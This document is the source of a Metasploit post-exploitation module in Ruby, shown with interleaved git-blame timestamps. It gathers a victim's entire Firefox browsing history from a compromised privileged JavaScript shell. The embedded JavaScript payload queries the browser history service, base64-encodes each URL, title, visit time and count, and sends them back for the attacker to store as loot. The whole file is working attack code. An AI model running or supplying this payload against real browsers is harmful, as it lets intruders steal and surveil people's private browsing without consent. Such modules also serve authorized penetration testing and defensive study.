2014-04-14 17:27:18 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'json'
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Firefox Gather History from Privileged Javascript Shell',
|
|
|
|
'Description' => %q{
|
|
|
|
This module allows collection of the entire browser history from a Firefox
|
|
|
|
Privileged Javascript Shell.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'joev' ],
|
|
|
|
'DisclosureDate' => 'Apr 11 2014'
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2014-04-24 20:07:48 +00:00
|
|
|
results = js_exec(js_payload)
|
2014-04-14 17:27:18 +00:00
|
|
|
if results.present?
|
|
|
|
begin
|
|
|
|
history = JSON.parse(results)
|
|
|
|
history.each do |entry|
|
|
|
|
entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
|
|
|
|
end
|
|
|
|
|
|
|
|
file = store_loot("firefox.history.json", "text/json", rhost, history.to_json)
|
|
|
|
print_good("Saved #{history.length} history entries to #{file}")
|
|
|
|
rescue JSON::ParserError => e
|
|
|
|
print_warning(results)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def js_payload
|
|
|
|
%Q|
|
|
|
|
(function(send){
|
|
|
|
try {
|
|
|
|
var service = Components
|
|
|
|
.classes["@mozilla.org/browser/nav-history-service;1"]
|
|
|
|
.getService(Components.interfaces.nsINavHistoryService);
|
|
|
|
var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
|
|
|
|
|
|
|
|
var query = service.getNewQuery();
|
|
|
|
var options = service.getNewQueryOptions();
|
|
|
|
var result = service.executeQuery(query, options);
|
|
|
|
var fields = [];
|
|
|
|
var entries = [];
|
|
|
|
|
|
|
|
var root = result.root;
|
|
|
|
root.containerOpen = true;
|
|
|
|
|
|
|
|
for (var i = 0; i < result.root.childCount; ++i) {
|
|
|
|
var child = result.root.getChild(i);
|
|
|
|
if (child.type == child.RESULT_TYPE_URI) {
|
|
|
|
entries.push({
|
|
|
|
uri: b64(child.uri),
|
|
|
|
title: b64(child.title),
|
|
|
|
time: b64(child.time),
|
|
|
|
accessCount: b64(child.accessCount)
|
|
|
|
});
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
result.root.containerOpen = false;
|
|
|
|
|
|
|
|
send(JSON.stringify(entries));
|
|
|
|
} catch (e) {
|
|
|
|
send(e);
|
|
|
|
}
|
2014-09-24 20:07:14 +00:00
|
|
|
})(this.send);
|
2014-04-14 17:27:18 +00:00
|
|
|
|.strip
|
|
|
|
end
|
|
|
|
end
|